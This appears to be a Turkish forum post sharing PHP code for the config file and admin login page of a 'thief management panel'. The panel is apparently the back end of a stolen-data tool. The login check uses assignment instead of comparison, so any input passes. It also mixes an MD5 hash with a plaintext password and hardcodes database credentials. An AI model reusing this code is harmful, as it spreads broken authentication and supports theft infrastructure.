Config Dosyası :
<?PHP
/* Snip3r - istisnalar kaideyi bozmaz */
$conn
= mysql_connect("localhost", "asdasdads", "10203040");
if (!
$conn) {
echo "Baglanti yok: " . mysql_error();
exit;
}
if (!mysql_select_db("asdasdasd")) {
echo "akif abim yanlis yazmazdi: " . mysql_error();
exit;
}
mysql_query ("SET NAMES ’latin5' ");
?>Panel Giriş Dosyası
<?PHP
session_start();
// ***- Snip3r
include("../beyin.php");
$kadi=htmlspecialchars($_POST['kadi']);
$sifre=htmlspecialchars(md5($_POST['sifre']));
if($kadi='akif' and $sifre='akifaka'){
$_SESSION['kuki']=$kadi;
echo'<script>location.href="index.php";</script>';
}else{
$msg="Akif abim sifreyi yanlis yazmazdi Allah Allah";
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Hirsiz Yönetim Paneli</title>
<link href="../images/default.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #292929;
}
.textForm {
font-family: Georgia,Arial,Helvetica,sans-serif;
background: #222222;
border-bottom: #606062 1px solid;
border-left: #606062 1px solid;
border-right: #606062 1px solid;
border-top: #606062 1px solid;
color: #999AA3;
font-size: 11px;
}
.inputButton {
font-family: Georgia,Arial,Helvetica,sans-serif;
background: #999AA3;
border-bottom: #606062 1px solid;
border-left: #606062 1px solid;
border-right: #606062 1px solid;
border-top: #606062 1px solid;
font-size: 12px;
color: #FFFFFF;
/* height: 19px; */
}
.style8 {
font-size: 11px;
font-family: Georgia, Arial, Helvetica, sans-serif;
color: #666666;
}
</style></head>
<body>
<div align="center" class="tablo">
<form id="form1" name="form1" method="post" action="">
<p> </p>
<p><font color="#FF0000"></font></p>
<div id="text6"><br />
</div>
<table style="border: 1px solid rgb(128, 128, 128);" width="310" bordercolor="#18181C" bgcolor="#000000">
<tr>
<td style="color: rgb(128, 128, 128); bgcolor="#18181c"> </td>
<td bgcolor="#000000" class="style8">>>Hırsız Yönetim Paneli Girişi << </td>
</tr>
<tr>
<td width="102" class="style8">Kullanıcı Adı : </td>
<td width="198"><label></label>
<label></label>
<label></label>
<div align="left">
<input name="kadi" class="textForm" type="text" id="kadi" size="30" />
</div>
<div align="left"></div></td>
</tr>
<tr>
<td><span class="style8">Şifre : </span></td>
<td><div align="left">
<input name="sifre" class="textForm" type="password" id="sifre" size="30" />
</div></td>
</tr>
<tr>
<td> </td>
<td><label> </label></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" style="font-size: 8pt; font-family: Tahoma; color: #000000; border: 1px #70a0b8; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #ffffff" name="Submit" value="Giriş Yap" /></td>
</tr>
</table>
<br />
<br />
</form>
</div>
<div align="center" class="style4">
<p class="textForm">*****<br />
Powered by Snip3r<br />
Eyw. : h4cker.tr GUARD_FB dikey _ShadowmaN_ Asi_KraL<br />
© 2005- Şu an </p>
</div>
</body>
</html>
if($kadi='akif' and $sifre='akifaka'){ bu kodu denedim fakat olmadı.